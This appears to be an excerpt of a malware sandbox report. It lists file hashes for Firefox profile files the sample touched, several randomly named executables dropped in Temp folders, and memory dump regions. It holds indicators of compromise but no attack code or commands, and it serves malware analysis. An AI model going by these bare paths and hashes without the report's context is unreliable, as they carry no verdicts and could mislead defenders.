SHA512 380a94251da5fd99b63c4fe75068e827d0825a60c54ec513c40a9fe0d1200c3d9496ba0cb1712f7d66f520bad27ede562d02c5abf67e9107f9a5360c6aa2f6b0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 ce9f67f18b3cc9f9ab5f4bb281371815
SHA1 85b3126902debdd28c8640b28d535c201fc32f7b
SHA256 b9b6a47beff5f3619659af693c408429a093ff7681ab2bbcfbe93fa11b6aaf1c
SHA512 dca225b96fe3c6808bfed893355b163e39f97a04f8191ec75f9b27ca4bf7b01348e5268d366091edc0407c561924ffb068c5c3f5e5292eb71861c5e06fc531b7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 669adc0a4da79575660d154753155cba
SHA1 1765212aec0ea138e4bb5ca506e6262a6f9e5d98
SHA256 d35f0e6943b5bfeda572a98cd88e857d7b35b56a046930c59be1dc050487d9f8
SHA512 ecf112a9f9d88345d67b70d4d379824ffd4c8efd0ac8718edf71c74cca95a6247f6dc8f20eb5552c9417222d2d8b817234c2543dabc102d8fa7c8844f7ee4b65

memory/4124-855-0x0000000000880000-0x0000000000CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 604dc968bb115040a0c173b8afd3a6be
SHA1 fbf8e81adaed465233d47bd463fe75bf6320839a
SHA256 8af5173123b7f1a7851e69970a654444e9441ca9c4adea10336cd567d181b7e4
SHA512 8815f260186e76f2fb319362d2299e0fbde81517f9490ce7cc8290494c2ba48258f8d64451e55a37158f5b6bfcac9630b01d16a4125d874dfedc144538d9a874

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 308547efe48c8ba67b472412a367e6be
SHA1 014d1aebb7dbe247acbd3020d57a7df35bd131a0
SHA256 2283bdcb57d4229f4924ab257d3ada5889694e9909bfbb1a7772d9aeb3aafdd7
SHA512 2d5b5c633f9b7c72ad2d680399715c5f2b84931d777ff13c281162af4a9b249fb8a366125579891c91a7d617acfe6d8cde515c4691bf014bf87e02253d66cedd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 c191a48995edac2e07b36be2ec0920dd
SHA1 2512f887d6e27d93b56a88ca7eb083e076cf3cc8
SHA256 e9b6aac304cc3ab59e6546d9b2758143e1007637d1a958f6c046d67cc4f7ad2e
SHA512 cfa44fe7a02ae2cef990999dc710bb4b2af2c21258c8293d406382e5ef62a4b85d769c7e82aaace11deeda386f111826fe27f7e63f4c05a10bd016404e078ae4

memory/2460-940-0x0000000000180000-0x000000000048A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/5872-953-0x0000000000EB0000-0x000000000134B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/5496-983-0x0000000000E30000-0x0000000000EA0000-memory.dmp

memory/6340-992-0x00000000007C0000-0x0000000000C7C000-memory.dmp

memory/2460-991-0x0000000000180000-0x000000000048A000-memory.dmp

memory/6340-994-0x00000000007C0000-0x0000000000C7C000-memory.dmp

memory/5872-996-0x0000000000EB0000-0x000000000134B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 236182fcd859f3b16c29914c2b329d3c
SHA1 8d24a1d9aab9881254b4952ff9dba42643641f26
SHA256 54be5e300544786993b440a3421ca1c3ed51b7ad6bca9d45d8d822f9f7a0f03a
SHA512 36406fbfa58a130dbbb9093d1d26bbec28921be8a999c965e1fecc20209096e7ddb652131216e74b290b7bb6b32877a24f5a18f908a4286f0e8a134deb0ec5d7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 ae2ab8b70c6e8bcbcf522564f9e5e80c
SHA1 e9c4fc05a1b522a1deea67a5947da8e06472d2ef
SHA256 b6bedf8a08ed7c697ae9fe3013279eda7ac17c41a4d80a2aa9ee5ed60ece3117
SHA512 3977c46ed0cc5014a16c0ff91b17482a9eb258a79bf1bc6d49c51cbdf8468719b41aee81e58dc43e971c320c84cd69fe4041a6000aaaebbfb4a553a06ddeccd4

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 0f677699be8371325c064eac8abd0f7e
SHA1 4fd6bed26fedde275039d9dad6be8c97b7616059
SHA256 5548d314d5fd663b47c714d0a3d6b06543e01d51ef3dbc35a5e38f5498f05f3f
SHA512 08bbd03c811175c300ae2cb719e9d7907688ebfe864f793606561c70266a0138281b47eb76e30128aea3e8bf84ddd46817996ca3884b732232f0bea4c0ef4fc8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 19cfcf04e73e9e673782d0e1309556a0
SHA1 8a8374ff81e5c822fa428c85fc6052beb19df5d1
SHA256 77c70b1e3b3c3ce1c5a6b8a95e1b8cd9ec55c4da9eb96f17ecea55c7fbd04f37
SHA512 63d1e99ec7a5b9bd4f2e7878c6d50b8cfdb5a7b97e9fca712f501a6a499f35d5973f014d2444bad194d9a7f7d732e5185b6309223fd92a87476889510009008b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 994006b1c190f8dd29dc5c1557d7f694
SHA1 3a6ac5d4304f4d50e8ec195b735700f9c784c36f
SHA256 e6445c0002ff328032f60c4358d809a323f561a3b364e2d5d9f683a517ff65d4
SHA512 ed32292d51e940ea27a9b47a63311ccf3e6acb4ee07afdac513b9b158fea81163f4ab8c0b5e8cc8ef94cdab27587431e10dcf56e2040a62698c622a97244c7da

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3036-1267-0x0000000000CC0000-0x0000000000D20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 398d89321278c582cbff8ba297e0c100
SHA1 e2688e1318be816d8236b215fde98707e9612395
SHA256 5701a135fd11b467c6229cdd09521a43e8f3faa8b563a1326a63053ee25fbd14
SHA512 04e2d53bf90e609d30c5f6688744d6a9188c31366a4518e68200d5dbd544ee0f98e45dd24cec23eca8203eb1d86958ddeb4e06481cc0fcf738af3fd05e941c18

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 7e3bfdc7f077a0cc43d79cc92e13157d
SHA1 588c4b9b1b43cc63f946f4bf727106db9cd95ae1
SHA256 23118f005edbb9920182e7016fe2f8dc358d8ab38a0a9ab3d96c325fece2af7d
SHA512 558e650b34d14fd6bb25ffc878e5780e21afcbff521602462195aa2adce5e47fb1154e6a9f24675e25610137fefd727cbe47ca94bb6916532dec98c9820953a0

C:\Users\Admin\AppData\Local\Temp\10109050101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/5760-3633-0x00000000007D0000-0x0000000000EBE000-memory.dmp